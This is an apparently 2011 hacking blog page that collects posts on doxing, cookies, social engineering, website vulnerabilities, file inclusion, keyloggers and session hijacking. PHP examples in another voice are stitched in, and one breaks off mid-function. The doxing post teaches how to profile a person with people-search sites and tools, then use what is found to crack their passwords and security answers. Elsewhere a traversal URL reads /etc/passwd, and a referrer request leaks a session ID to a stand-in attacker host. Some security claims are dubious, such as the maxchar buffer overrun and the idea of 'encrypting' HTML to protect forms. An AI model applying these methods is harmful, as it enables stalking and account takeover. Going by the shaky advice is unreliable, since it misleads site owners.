Showing posts with label Hackers Info. Show all posts

Friday, September 9, 2011

Encrypt Your Search Queries Using SSL Search Engine

Every time you use a regular search engine, your search data is recorded. Major search engines capture your IP address and use tracking cookies to make a record of your search terms, the time of your visit, and the links you choose, then they store that information in a giant database.


What is SSL?
SSL (Secure Sockets Layer) is a protocol that helps to provide secure Internet communications for services like web browsing, e-mail, instant messaging, and other data transfers. When you search over SSL, your search queries and search traffic are encrypted so they can't be read by any intermediary party such as employers and internet service providers (ISPs).
A list of SSL (Secure Sockets Layer) search engines for anonymous Internet search is given below:
Encrypted Google Search over Secure Sockets Layer (SSL) gives you a completely encrypted search link between your computer and Google. When search traffic is encrypted, it can't be read by third parties trying to access the connection between a searcher's computer and Google's servers. The service is available for web searches only; image and maps searches still do not use SSL encryption.
Google Encrypted can be accessed through:
https://encrypted.google.com

Duck Duck Go is another SSL search engine that challenges Google on privacy. It pulls search results from Microsoft Bing's and Google's search APIs. It has its own syntax: the !bang command allows you to search another site directly. It allows you to change the look and feel of the search engine, and another awesome thing is that Duck Duck Go is managed by a single person, Gabriel Weinberg, and there is no advertisement in this search engine.
Duck Duck Go can be accessed through:
http://duckduckgo.com/
The IxQuick SSL search engine was awarded the first European Privacy Seal. IxQuick changed its name to Startpage in July 2009. Ixquick's privacy policy is to not save the IP address or any other private data on any search, and it announced that it would remove its users' personal data within 48 hours.
IxQuick | Startpage can be accessed through:
http://www.ixquick.com/
http://www.startpage.com/
Yauba is the world’s first privacy-safe, real-time search engine. Yauba is a new, experimental Indian search engine that seeks to transform the way people find information online, while providing maximum protection for their safety, security and privacy. Yauba's privacy policy claims that they do not use any cookies and that they delete all of your personally identifiable information from their servers on a daily basis.
Yauba can be accessed through:
http://www.yauba.com/

Scroogle is an ad-free Google search proxy which prevents the searcher's data being stored by Google. Scroogle aims at letting you use Google without getting tracked. It works very simply, acting as a middleman between you and Google: you send your search query to Scroogle, they send it to Google, Google sends Scroogle the result, and finally Scroogle sends you the result. In the end, Google has no way to know you’re the person who did the search. Additionally, Scroogle also offers the ability to search over an encrypted (SSL) connection, so your ISP (or corporate network, etc.) can’t see what you’re searching either.
Scroogle can be accessed through:
http://www.scroogle.org/
https://ssl.scroogle.org/
 
Benefits of using SSL Search Engine
Tracking of your personal computer's IP address is avoided
The period (date and time) of searching is hidden
Any cookie that is generated will be deleted after your search; the Duck Duck Go search engine does not use cookies by default
Query terms/keywords will not be stored in a database

Doxing - Hackers Information Gathering Technique

Doxing is a technique of tracing someone or gathering information about an individual using sources on the internet. Its name is derived from “Documents” or “Docx”. The doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that “the more you know about your target, the easier it will be to find his or her flaws”. This article gives you a brief explanation of doxing and explains how to hack user accounts using doxing.


Information that You Can Find Using Doxing
People using the internet usually leave their information on some website, mostly on social networking sites like Facebook, Twitter, Google Plus, etc. Information that you can find using the doxing technique is given below.
Activities
Birthday
Contact Information
Gender
IP Address
Location
Name
Personal Information
Social Networking Site Profiles
Website
and many more. . .
Useful Website for Doxing
Pipl - Most of the higher quality information about people is simply "invisible" to a regular search engine. Unlike a typical search-engine, Pipl is designed to retrieve information from the deep web. Pipl robots are set to interact with searchable databases and extract facts, contact details and other relevant information from personal profiles, member directories, scientific publications, court records and numerous other deep-web sources.
Wink - It’s similar to Pipl: find people by name and get their phone number, address, websites, photos, work, school and more.
123people - 123people is a real-time people search service that looks into nearly every corner of the Web. Using the 123people proprietary search algorithm, you can find comprehensive and centralized name-related information consisting of images, videos, phone numbers, email addresses, social networking and Wikipedia profiles and much more.
Zaba Search - Information found using ZabaSearch is all available elsewhere on the web and is all public information. ZabaSearch is a search engine, not a database and does not house, create or manage the information in the search results.
WHOIS – Domain Tools provides a directory that serves as a comprehensive snapshot of past and present domain name registration and ownership records. Most domain hacking is done by gathering information from this website.
Social Networking Site - A social networking site is a website where individuals can set up an online profile, describing their interests, and add links to other profiles. Social networking is one of the major sources for the doxing technique. Some social networking sites like Facebook, Google Plus, Hi5, LinkedIn, MySpace, and Twitter contain a lot of information about the victim.
Search Engine - Search engine is designed to search for information on the World Wide Web and FTP servers. Information may consist of web pages, images, information and other types of files. Some top search engines for doxing are Ask, Bing, Google, Yahoo!.
Useful Tools for Doxing
Maltego - Maltego is an open source intelligence and forensics application. It will offer you timeous mining and gathering of information as well as the representation of this information in an easy to understand format.
Creepy - Creepy is an application that allows you to gather geolocation related information about users from social networking platforms and image hosting services. The information is presented in a map inside the application where all the retrieved data is shown accompanied with relevant information to provide context to the presentation.
How Doxing is Used for Hacking?
Hackers can gather information about the victim and create a dictionary file for a target person alone. Using that dictionary file, he can crack your passwords.
A hacker can get the victim's security question answer using doxing.
Conclusion
Doxing needs intelligence and searching ability. You have to guess where to search and what to search for about a person. Depending on your searching ability, you will get what you require. Doxing is used mainly by cyber crime experts and hackers. Overall, doxing is a powerful hacking technique. If you like this article, please leave a small comment/feedback below.

Computer Cookie - Working, Vulnerability and Security


Computer cookies are small pieces of information in text format that are sent to a web browser by a web server. This information can be accessed either by the web server or by the client computer. Cookie information can be used for authentication, identification of a user session, user's preferences, shopping cart contents, or anything else that can be accomplished through storing text data.

What are the types of Cookie?
Session cookie
Persistent cookie
Secure cookie
HttpOnly cookie
First-Party Cookie
Third-Party Cookie
Super cookie
Zombie cookie
Unsatisfactory Cookie
Role of Cookie in Internet
Session Management
Session management is the process of keeping track of a user's activity across sessions of interaction with the computer system.
Personalization
Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.
Tracking
Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referrer field of the HTTP request header, but cookies allow for greater precision.
How to View Cookies in Web Browser?
Microsoft Internet Explorer
Open the Microsoft Internet Explorer software program.
Click on “Tools” in the main menu area of the Internet Explorer browser.
Scroll down and select “Internet Options” from the tools menu.
Look under the Browsing History section on the General settings tab.
Press the “Settings” button.
Select the “View Files” button and scroll down until you see the files labeled as cookies.
Mozilla Firefox
Start or open your Firefox Internet browser.
Select the “Tools” option from the main menu of the Firefox 3 software program.
Find the “Options” setting on the tools menu and click on it.
Click on the “Privacy” button.
Locate the “Use Setting for history” tab and select “Show Cookies”.
Google Chrome
Launch your Google Chrome Internet browser.
Find the wrench icon located on the main menu and right click on it.
Choose “Options” from the menu.
Locate and select the “Under the Hood” tab.
Look under cookie settings and press “Show Cookies.”
Apple Safari
Open the Safari Internet browser software program.
Click on “Preferences” in the main browser menu.
Find the “Security” tab and click on it.
Select the “Show Cookies” option on the Security tab.
Vulnerability on Cookies
Cookies are tracking devices for websites. They keep track of commonly used information to help your browser operate more efficiently. They usually won't store passwords but often track browser history, usernames, and other possible identifiers that can be used to gain access to accounts or exploit security vulnerabilities in your computer. Often they are simply text or web URL files, so they won’t contain programs (i.e. viruses). The problem that cookies pose is that they have the ability to “share” this information over the internet.
How to Prevent Cookie from hackers?
Delete all cookies or individual cookies from your browser regularly
Use an updated antivirus in your system
Enable a firewall in your system
Use HTTP Secure Connection if available

Next Generation Domain Naming System - ICANN

The Internet Corporation for Assigned Names and Numbers (ICANN) announced a historic change to the Internet's domain naming system on 20th June 2011.
The ICANN board approved a plan to expand the number of possible internet domain names. The new domain naming system allows you to create new Top Level Domains in any language or script, for example .facebook, .hacker, .mac. Currently there are 22 gTLDs (.com, .net, .org) and 250+ ccTLDs (.fr, .de, .cn). To acquire a new generic top-level domain, an organization will be required to pay ICANN $185,000.
Below are some examples of new top-level domains announced by ICANN:
www.bmw.car
www.nokia.mobile
www.icici.bank
Thus, ICANN gives users and organizations the freedom to choose their own new custom gTLD.

New gTLDs will change the way people find information on the Internet and how businesses plan and structure their online presence. Internet address names will be able to end with almost any word in any language, offering organizations around the world the opportunity to market their brand, products, community or cause in new and innovative ways.

Applications for new gTLDs (generic top-level domains) will be accepted from 12 January 2012 to 12 April 2012.

Free "The Hackers Underground Handbook" E-Book




The Hacker's Underground Handbook
Learn How to Hack and What It Takes to Crack Even the Most Secure Systems!
Author
David Melnichuk
Website
Learn How To Hack
Description
The information given in this underground handbook will put you into a hacker's mindset and teach you all of the hacker's secret ways. The Hacker's Underground Handbook is for the people out there that wish to get into the amazing field of hacking. It introduces you to many topics like programming, Linux, password cracking, network hacking, Windows hacking, wireless hacking, web hacking and malware. Each topic is introduced with an easy to follow, real-world example. The book is written in simple language and assumes the reader is a complete beginner.

Wednesday, September 7, 2011

What is Social Engineering

Social Engineering is the most popular and 100% working tool used by hackers to attack a target system. Social engineering is the trick and mode of gaining sensitive information by exploiting basic human nature such as trust, fear and helpfulness. There is no software, firewall system or antivirus that can protect against human stupidity. Social Engineering is the term hackers or attackers use for breaking into a network system with the help of human weakness.

Many companies put authentication processes, firewalls, IDS and IPS, Virtual Private Networks and network monitoring software in place to secure their company network and data from malicious attacks, but a hacker can still get past all of these major security devices through social engineering and break the company's network security. For example, companies put a great deal of effort and new technology into securing their network and data from malicious attack, but if an employee unwittingly gives away key information by replying to an unknown email or by answering questions over the phone from someone they do not know, a hacker can use this information to break the computer security with minimum effort. That is why Social Engineering plays a very vital and important role for hackers. Social engineering attacks are very difficult to protect against with any security system.

Website Vulnerabilities continued

Closely related to hidden field manipulation, buffer overruns are engineered in a similar fashion; any text input field with a maxchar=n property can be used to potentially shut down the server. The source code can be accessed, and the maxchar property removed. The hacker then enters, say, 10,000 ones and submits the form. What happens next? The server shuts down, taking your business with it. A semi-secure solution to this would again be to encrypt any HTML form source. A better solution would be to allocate memory dynamically, therefore not presetting the memory buffer to a certain size, or writing a function that checks the length of the input before passing the results to the server. If the input exceeds the memory allocation, simply pass back a NULL value.

A simple, yet effective trick in deterring hackers is to configure your web server to hand out customised error 404 pages with a status of 200 when a resource is not found. Most genuine users will not even notice, and a hacker using software to scan for available resources will think they have stumbled across a gold mine. When the hacker goes to check, they will find that they have been duped and hopefully see examining your site further as a waste of time. This could be seen as hacking hackers or the hacker becoming the hacked...

Netcat

You could take this one step further and use an old UNIX application called netcat to crash anyone who attempts to hack your site. Netcat makes and accepts TCP connections, but it can be used by a hacker for many things, including obtaining remote access to a shell, port-scanning and even hi-jacking services and bypassing firewalls. It can also be used to monitor ports and flood suspicious requests, similar to a buffer over-run, by using it to pretend you are running a service that you are not and using the 'yes' command when someone tries to exploit that service. Netcat is an extremely powerful application in itself and is usually part of any self-respecting hackers' tool-kit. Morally, you could look at this as hitting them back first.

Conclusion

I hope that I have drawn your attention to some of the more basic but often overlooked entry-points that a hacker may use to gain entry to your web applications, and highlighted the need for basic auditing of the security enforcement of your site.

This article is not intended to be a complete solution for defense against hacking, but more the starting point for your considerations. No site is completely hack-proof, but there are few sites that really need to be. As a web developer, your main security concern is first to assess how much security you will actually need. The more secure you need to be, the more your aims will move toward hiring the services of a professional security solution.


Who is hacker?


Unfortunately, hacking today is a fact of life. But not all hackers are bad hackers; in fact the term hacker can describe anyone who is enthusiastically interested in computers or programming. The original hackers, the first ever known, are reported to be a group of model railroad enthusiasts who, sometime in the 1950's were given some old telephony equipment as a donation. Not wanting to waste this equipment, they 'hacked' or modified it for use in their railroad system and were able to 'dial in' track switching commands using recycled dialers and other parts of the phone equipment. So the original term hacking also meant to modify or exploit a previously unknown use of something. Punch-card computer systems were soon the subject of hacking, and programmers delighted in finding ways of doing the same things with fewer punch cards. It was shortly after this, sometime in the early seventies, that malicious hacking began to come about in the form of phreaking, hacking into telephone networks and having telephone usage charged to other people or not at all.

Today the terms hacking and hackers have many connotations, the best known being of course people who exploit software and/or the Internet for personal gain or fun. These hackers are sometimes referred to as black-hat hackers, or crackers, and those that simply use software to hack, with no real programming knowledge are called script-kiddies. There is also an increasing number of so-called white-hat or ethical hackers who, among other things, use their skills to test web applications for weaknesses and to help develop security in web applications and software. Often, people who look at open source software and attempt to refine and add to its existing features are referred to as hackers. 

The purpose of this article is not to teach you how to hack sites successfully; I won't be teaching you how to steal credit card numbers, bring down Hotmail or reverse-engineer the latest release of Windows. I'm simply going to show you a couple of scenarios that may reveal to you how vulnerable your existing site may be, or will hopefully help you prevent any future sites from having these vulnerabilities. Don't be fooled however; the iron-clad security needed by some sites such as online banks requires the highest degree of professional assistance. Countless books have been written on the subject of hacking, so there is no possible way for me to discuss all known types of attack. There are some techniques you can try out to attempt to assess the vulnerability of your own site and applications, techniques that once learned, you should employ as part of the creative process in every site you construct.


What is File Inclusion attack?

Description (This is for educational purposes only)
A Local File Inclusion attack consists of exploiting an unprotected script on the server to read the content of another file that the application does not permit access to. The following example shows a vulnerable PHP script (index.php).

With such a script, it is possible to read the content of the /etc/passwd file by calling it this way:

http://www.somevulnerablesite.com/index.php?page=../../../etc/passwd
Null byte inclusion
Null byte inclusion makes it possible to read files on a server using a Local File Inclusion (LFI) attack. The following PHP example illustrates the attack:

Such a vulnerable script could enable a hacker to access an unexpected file by calling such an address:

http://www.somevulnerablesite/index.php?page=../../../etc/passwd
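
An added example, not the post's original index.php: the include pattern described above next to an allow-list version, with functions that only return the path they would hand to include() so the difference can be inspected safely. The directory, page names and helper names are constructed for illustration; the null-byte suffix bypass affected PHP before 5.3.4.

```php
<?php
// Added example; PAGES_DIR, PAGE_MAP and all function names are hypothetical.
const PAGES_DIR = '/var/www/pages';          // constructed document directory

// Vulnerable pattern: the "page" parameter flows straight into the path,
// so "../" sequences climb out of PAGES_DIR.
function resolve_page_vulnerable(string $page): string
{
    return PAGES_DIR . '/' . $page;
}

// Same pattern with a forced ".php" suffix. PHP before 5.3.4 cut the path
// at the first NUL byte when opening the file, which discarded the suffix.
function resolve_page_vulnerable_suffix(string $page): string
{
    return PAGES_DIR . '/' . $page . '.php';
}

// Models what those old PHP versions actually opened.
function legacy_truncate(string $path): string
{
    $pos = strpos($path, "\0");
    return $pos === false ? $path : substr($path, 0, $pos);
}

// Collapse "." and ".." segments without touching the filesystem.
function normalize_path(string $path): string
{
    $parts = [];
    foreach (explode('/', $path) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($parts);
            continue;
        }
        $parts[] = $seg;
    }
    return '/' . implode('/', $parts);
}

// Containment check, useful for logging and detection of traversal attempts.
function is_inside_base(string $path): bool
{
    $base = PAGES_DIR . '/';
    return strncmp(normalize_path($path), $base, strlen($base)) === 0;
}

// Hardened: user input is only a key into a fixed allow-list.
const PAGE_MAP = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page_safe(string $page): ?string
{
    if (strpos($page, "\0") !== false || !array_key_exists($page, PAGE_MAP)) {
        return null;                          // caller should answer with 404
    }
    return PAGES_DIR . '/' . PAGE_MAP[$page];
}

// Constructed inputs: one legitimate page name and the two requests from the post.
foreach (['about', '../../../etc/passwd', "../../../etc/passwd\0"] as $input) {
    $opened = normalize_path(legacy_truncate(resolve_page_vulnerable_suffix($input)));
    printf(
        "input=%s\n  no suffix     -> %s (inside base: %s)\n  legacy suffix -> %s\n  allow-list    -> %s\n",
        str_replace("\0", '\\0', $input),
        normalize_path(resolve_page_vulnerable($input)),
        is_inside_base(resolve_page_vulnerable($input)) ? 'yes' : 'no',
        $opened,
        resolve_page_safe($input) ?? '(rejected)'
    );
}
```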



Protecting from Keyloggers


I guess most people know what a keylogger is, but I'll make a short introduction for those who don't.
A keylogger is a program like a virus: when it infects your computer it remains hidden every time you turn it on. Everything looks OK but the keylogger is there working, recording all your keystrokes and sending all the info to the "hacker". So it's not really so difficult to steal passwords from other people's computers using this kind of program. And you'll notice nothing unusual until you log in to your e-gold account and see all your money has magically vanished, or try to log in to your 12DP account and get the "Incorrect login" message... or something worse, who knows!

The problem is that some keyloggers are so sophisticated that an antivirus program cannot detect them. I have personally tested one of those keyloggers on my computer and my Norton (updated) antivirus didn't block it, nor showed any warning... nothing! ...which is really worrying.

OK, so let's get to the point.

Maybe you've seen that many bank websites ask you to enter your secret number or password using a virtual keypad on their own website instead of typing it. This is a security system designed to prevent keyloggers from recording sensitive data from customers' computers.
OK, but 12DP, E-Gold, etc. have nothing like that; you just have to type your password as usual, therefore you're exposed to getting your passwords stolen in case your computer is infected by a keylogger.

Now this is the interesting thing: you can use your "own" security system, similar to that used by banks, just by installing a "virtual keyboard" program. When you run this kind of program, you'll see a virtual keyboard on your screen, so you can "click" your passwords instead of typing them.
In fact I think these programs were designed as an accessibility tool, you know, for people with some kind of physical deficiency who are not able to type, but we can give it a very different application.
Of course "clicking" a password is slower than typing, but it's much more secure, and there is no keylogger able to track your passwords that way! (as far as I know at least).

Where to get one of those programs? For Windows users (the majority, I would say), go to microsoft.com and search "Microsoft Visual Keyboard" (compatible with Win98/NT/ME/2000/XP). It's freeware!
If you want a program like that for Linux, Mac, etc. go to Google and try searching "Visual Keyboard", "Virtual Keyboard", and probably you'll find something. Good luck!

So in short: if you care about your money, please protect your passwords.


How to change MAC address in Windows?

Under Windows, the MAC address is stored in a registry key. To change a MAC address, find that key with `regedit` and change it. Of course, Microsoft keeps moving the location of the key around!

Windows XP adds an option to change the MAC address on some network cards under the Advanced tab in the network adapter's Properties menu.

A much easier and more reliable method to change a MAC address under Windows is to use a software utility program designed to do this for you.

Macshift is a free utility that you can use to spoof your MAC address under Microsoft Windows.

What is Encryption?

The word "encrypt" means to hide, or to make secret. The earliest forms of cryptography (which just means "secret writing") used simple ciphers to turn ordinary text into unreadable nonsense.

For example, suppose you wanted to encrypt a phrase in such a way that your friends could easily read it, but others could not. You would need to have a simple rule, or ciphering algorithm, that could be used to both encrypt and decrypt the message. A simple encryption algorithm is "shift each letter by one." With this simple code, "a" is coded as "b" and so forth.

Using this rule, the phrase "where science meets fiction" becomes "xifsf tdjfodf nffut gjdujpo."


If you try a short example yourself, it should be obvious that computers make the process of encryption and decryption easier and faster.

The "shift each letter by one" cipher is easy to implement - it is also easy to figure out. Over time, more complex encryption algorithms have been used to make it more difficult for others to figure out what cipher is being used.
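
An added example, not part of the original post: the shift cipher from the text, plus a key-recovery routine that simply tries all 26 shifts and keeps the candidate containing the most common English words. The word list and function names are constructed for illustration.

```php
<?php
// Added example; function names and the word list are hypothetical.

// Shift every ASCII letter by $shift positions, wrapping around the alphabet.
// Non-letters (spaces, punctuation, digits) pass through unchanged.
function shift_text(string $text, int $shift): string
{
    $shift = (($shift % 26) + 26) % 26;      // normalise negative shifts
    $out = '';
    for ($i = 0, $n = strlen($text); $i < $n; $i++) {
        $o = ord($text[$i]);
        if ($o >= 97 && $o <= 122) {          // a-z
            $out .= chr(($o - 97 + $shift) % 26 + 97);
        } elseif ($o >= 65 && $o <= 90) {     // A-Z
            $out .= chr(($o - 65 + $shift) % 26 + 65);
        } else {
            $out .= $text[$i];
        }
    }
    return $out;
}

// Score a candidate plaintext: number of words found in a small list of
// very common English words (constructed list, enough for short phrases).
function english_score(string $candidate): int
{
    static $common = ['the', 'and', 'that', 'with', 'this', 'from', 'have',
                      'where', 'when', 'what', 'which', 'there', 'you', 'for'];
    $score = 0;
    foreach (preg_split('/[^a-z]+/', strtolower($candidate), -1, PREG_SPLIT_NO_EMPTY) as $word) {
        if (in_array($word, $common, true)) {
            $score++;
        }
    }
    return $score;
}

// Try every possible key. With only 26 keys the search is instantaneous,
// which is why this cipher offers no real secrecy.
function recover_shift(string $ciphertext): array
{
    $best = ['shift' => 0, 'plaintext' => $ciphertext, 'score' => -1];
    for ($k = 0; $k < 26; $k++) {
        $plain = shift_text($ciphertext, -$k);
        $score = english_score($plain);
        if ($score > $best['score']) {
            $best = ['shift' => $k, 'plaintext' => $plain, 'score' => $score];
        }
    }
    return $best;
}

$ciphertext = shift_text('where science meets fiction', 1);
echo $ciphertext, "\n";
$guess = recover_shift($ciphertext);
printf("recovered shift=%d plaintext=%s\n", $guess['shift'], $guess['plaintext']);
```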

Keep in mind that a cipher can be made to work on any set of "bits" - not just text. It is also possible to encrypt a digital picture file, a digital music file or a digital video file. Once such a file has been encrypted, it must be decrypted to be viewed or heard.

If you are really serious about security, you will want to use a really serious encryption standard. See the Data Encryption Standard (used by the federal government for over thirty years) or the Advanced Encryption Standard (the current gold standard for encryption).

How to become a hacker


Hello Friends,

This question has been asked of me by a lot of people. Today I will introduce you to a well-known hacker, Mr. David Melnichuk, who has written a book, “The Hacker’s Underground Handbook”. This book is a first step for all the people who want to become a hacker. Following is a short conversation between me and David:


Hungry Hacker: “David, what’s this The Hacker’s Underground handbook that I keep hearing about?”


David: “I wrote this book a couple months ago. When I first got into the hacking scene, I was just like any other newbie. I asked stupid questions and thought that there was some easy trick to hacking. Little did I know that 4 years later I would still be learning and loving every minute of it. Anyways, after searching for “how to hack” and not coming up with anything useful and understandable, I was told to go read some books.”


Hungry Hacker: “So what did you learn from those books?”

David: “Well, frankly speaking, I didn’t understand what I was reading. Only after some independent research on many topics did I start to understand what hacking was and how broad of a topic it really was.”


Hungry Hacker: “So what did you do after that?”


David: “I decided to write up this E-Book for all the newbies out there that would love to get into the hacking scene but have absolutely no idea where to begin. This is where my E-Book, The Hacker’s Underground Handbook came from.”


Hungry Hacker: “What can one get from this book?”


David: “The book was created for absolute beginners. It will take you from absolute zero knowledge and leave you at a confident level making you aware of where to go next and how to continue to learn.”


Hungry Hacker: “What all Topics does it cover?”


David: “It covers the beginning of many topics like programming, Linux, password cracking, phishing, network hacking, wireless hacking, malware, and Windows hacking.”


Hungry Hacker: “Thanks David for writing such a useful book.”


So friends, I don’t think there is now anything left for me to answer your question. If you want to become a hacker then this book is what you require. Go and grab your copy of “The Hacker’s Underground Handbook” as early as possible below.


 

Website Vulnerabilities

Summary: The purpose of this article is not to teach you how to hack sites, but to show you some scenarios that may reveal to you how vulnerable your existing site may be, or will hopefully help you prevent any future sites from having these vulnerabilities.

Malicious hacking often takes primarily two things, time and software. This means that most web sites or applications are vulnerable in some way. But it also means that most weaknesses can be protected by time and applications; for example, in the context of hacking, the difference between a five-digit password and an eight-digit password including a number is approximately 22,000 years. I mean by this that it would take a hacker, using some kind of dictionary attack program, around 22,000 years to find your password if it was eight alphanumeric characters. As a standard rule of thumb, require your users to create passwords of at least 8 characters in length and ask them kindly not to include words found in the dictionary. This is for your site's protection as much as their own and that of their fellow users.

Web Forms

Web forms are an easy target for hackers or anyone who simply wants to break your applications, as the user is given the opportunity to pass information to your web server, which performs calculations using that information. If you have any forms on your site, (which you undoubtedly will) visit one of them now and in the first text input field you come to type:

I could use this field to execute a script

Press the Go! or Submit! button and you should see:

I could use this field to execute a script

Okay, so you'll probably have some kind of form validation implemented to prevent fields in your forms being left blank, but you can see what I'm getting at here. You just hacked your own form, albeit in a very basic way.

Fortunately, there is a very simple PHP function which prevents this from happening: htmlspecialchars. It's a function that is usually used in conjunction with MySQL database queries, but can be put to work in form processing PHP scripts as well.

Let's say, for example, that the first text input field on your HTML form captures visitors' names and is called 'name'. This would be assigned the variable '$name' in the PHP script that's invoked when the submit button is pressed. All you need to do to prevent code execution on your forms is include:

$name = htmlspecialchars($name);

somewhere near the top of the PHP file. Repeat the above example, and the text should be displayed normally. It won't prevent hackers from trying to hijack your applications, in the same way that locking your car won't prevent it from being stolen, but it's a function that should be included in any form processing script you write as a basic security consideration.

If your site uses multiple forms, in a shopping cart for example, it will probably rely upon hidden fields to transfer information from one page to the next (often referred to as persistence). You'll find that if you save the source code of a page containing hidden fields, you can modify the values of the hidden fields and then reload the modified page in your browser. Try experimenting with this on some of the simpler forms you use that contain hidden fields; if you've been successful, not only have you hacked your own site again, but you've highlighted the fact that others can do this too.

This is an open door to hackers, especially in the case of shopping carts; what would happen to your business if a hacker were able to use the above technique to change the price of all of your products to $1?

One way around this would be to use a one-way hash such as md5 to generate an outgoing message digest from a concatenated string of all the hidden field names and values plus a secret key, and to send that digest out with the form. When the form is submitted, an incoming digest is computed in the same way, from the submitted hidden field names and values plus the secret key. If the outgoing digest differs from the incoming digest, the hidden field values have been tampered with. An easier, but admittedly slightly less secure, method of preventing hidden field manipulation would be to use an HTML encryption tool on pure HTML pages, thus hiding the names and values of any fields.
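The digest check described above, as an added example that is not the original author's code: it swaps the md5-over-concatenation construction for HMAC-SHA256 (PHP's hash_hmac), which is designed for keyed digests. The function names, the sample field names and the SECRET_KEY placeholder are assumptions.

```php
<?php
// Added example, not the original author's code. SECRET_KEY is a placeholder:
// load a long random value from server-side configuration, never from the page.
const SECRET_KEY = 'placeholder-load-32-random-bytes-from-config';

// Build one unambiguous string from the hidden field names and values.
function canonical_fields(array $fields): string
{
    ksort($fields, SORT_STRING);           // order must not depend on the form
    $parts = [];
    foreach ($fields as $name => $value) {
        $name = (string) $name;
        $value = (string) $value;
        // Length prefixes stop ("a","bc") and ("ab","c") producing the same string.
        $parts[] = strlen($name) . ':' . $name . '=' . strlen($value) . ':' . $value;
    }
    return implode('|', $parts);
}

// Outgoing digest: keyed hash over the canonical string.
function sign_fields(array $fields): string
{
    return hash_hmac('sha256', canonical_fields($fields), SECRET_KEY);
}

// Emit the hidden inputs plus the digest for the outgoing page.
function render_hidden_fields(array $fields): string
{
    $html = '';
    foreach ($fields + ['digest' => sign_fields($fields)] as $name => $value) {
        $html .= sprintf(
            "<input type=\"hidden\" name=\"%s\" value=\"%s\">\n",
            htmlspecialchars((string) $name, ENT_QUOTES, 'UTF-8'),
            htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8')
        );
    }
    return $html;
}

// Incoming check: returns the trusted fields, or null if anything was altered.
function verify_fields(array $submitted, array $expected_names): ?array
{
    $digest = $submitted['digest'] ?? null;
    if (!is_string($digest)) {
        return null;
    }
    $fields = [];
    foreach ($expected_names as $name) {
        if (!isset($submitted[$name]) || !is_string($submitted[$name])) {
            return null;                   // missing field or array injection
        }
        $fields[$name] = $submitted[$name];
    }
    // hash_equals compares in constant time.
    return hash_equals(sign_fields($fields), $digest) ? $fields : null;
}

// Constructed sample data standing in for a shopping cart page and $_POST.
$cart = ['item_id' => '1042', 'price' => '49.95', 'qty' => '1'];
$names = array_keys($cart);
echo render_hidden_fields($cart);

$honest = $cart + ['digest' => sign_fields($cart)];
$tampered = ['price' => '1.00'] + $honest;   // price edited in the saved page

echo 'unmodified form: ', verify_fields($honest, $names) === null ? 'rejected' : 'accepted', "\n";
echo 'edited price:    ', verify_fields($tampered, $names) === null ? 'rejected' : 'accepted', "\n";
```

A matching digest only proves the server once issued these values, so include a per-session value or an expiry among the signed fields if replaying an old form would matter. Obfuscating the page's HTML offers no equivalent check, because the browser still submits the field values in the clear.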


What is Session Hijacking?

Session Hijacking

Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.

Detailed Description

HTTP is stateless, so application designers had to develop a way to track the state between multiple connections from the same user, instead of requesting the user to authenticate upon each click in a Web application. A session is a series of interactions between two communication end points that occurs during the span of a single connection. When a user logs into an application a session is created on the server in order to maintain the state for other requests originating from the same user.
Applications use sessions to store parameters which are relevant to the user. The session is kept "alive" on the server as long as the user is logged on to the system. The session is destroyed when the user logs-out from the system or after a predefined period of inactivity. When the session is destroyed, the user's data should also be deleted from the allocated memory space.
A session ID is an identification string (usually a long, random, alpha-numeric string) that is transmitted between the client and the server. Session IDs are commonly stored in cookies, URLs and hidden fields of Web pages. A URL containing the session ID might look something like:
http://www.123somesite.com/view/7AD30725122120803
In an HTML page, a session ID may be stored as a hidden field:

Sometimes, cookies are set to expire (be deleted) upon closing the browser. These are termed "session cookies" or "non-persistent" cookies. Cookies that last beyond a user's session (i.e., "Remember Me" option) are termed "persistent" cookies. Persistent cookies are usually stored on the user's hard drive. Their location is determined according to the particular operating system and browser (e.g., C:\Documents and Settings\username\Cookies for Internet Explorer on Windows 2000).
There are several problems with session IDs. Many of the popular websites use algorithms based on easily predictable variables, such as time or IP address, in order to generate the Session IDs, causing their session IDs to be predictable. If encryption is not used (typically SSL), Session IDs are transmitted in the clear and are susceptible to eavesdropping.
Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's session while that session is still in progress. In most applications, after successfully hijacking a session, the attacker gains complete access to all of the user's data, and is permitted to perform operations instead of the user whose session was hijacked.
There are three primary techniques for hijacking sessions:
1. Brute Force - the attacker tries multiple IDs until successful.
2. Calculate - in many cases, IDs are generated in a non-random manner and can be calculated.
3. Steal - using different types of techniques, the attacker can acquire the Session ID.
In Brute Force attacks, the attacker can try many IDs. For example, take a look at the following list of URLs, in which an attacker is trying to guess the session ID:
http://www.somesite.com/view/VW30422101518909
http://www.somesite.com/view/VW30422101520803
http://www.somesite.com/view/VW30422101522507
Session IDs can be stolen using a variety of techniques: sniffing network traffic, using trojans on client PCs, using the HTTP referrer header where the ID is stored in the query string parameters, and using Cross-Site Scripting attacks.
In a "referrer" attack, the attacker entices a user to click on a link to another site (a hostile link, say www.hostile.com):
GET /index.html HTTP/1.0
Host: www.hostile.com
Referer: www.mywebmail.com/viewmsg.asp?msgid=438933&SID=2343X32VA92
The browser sends the referrer URL containing the session ID to the attacker's site - www.hostile.com, and the attacker now has the session ID of the user.
Session IDs can also be stolen using script injections, such as Cross-Site Scripting. The user executes a malicious script that redirects the private user's information to the attacker.
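
The weaknesses listed above (IDs carried in URLs, sent in the clear, readable by injected script, and left valid indefinitely) map onto a handful of PHP session settings. The following is an added example, not part of the original post; the function names, the sample user ID and the 15-minute idle limit are assumptions, and it needs PHP 7.3 or later.

```php
<?php
// Added example, not part of the original post.
const IDLE_LIMIT_SECONDS = 900; // assumed policy; adjust to your application

function start_hardened_session(): void
{
    // Keep the ID out of URLs so it cannot leak through the Referer header.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    // Refuse IDs that do not match an existing server-side session.
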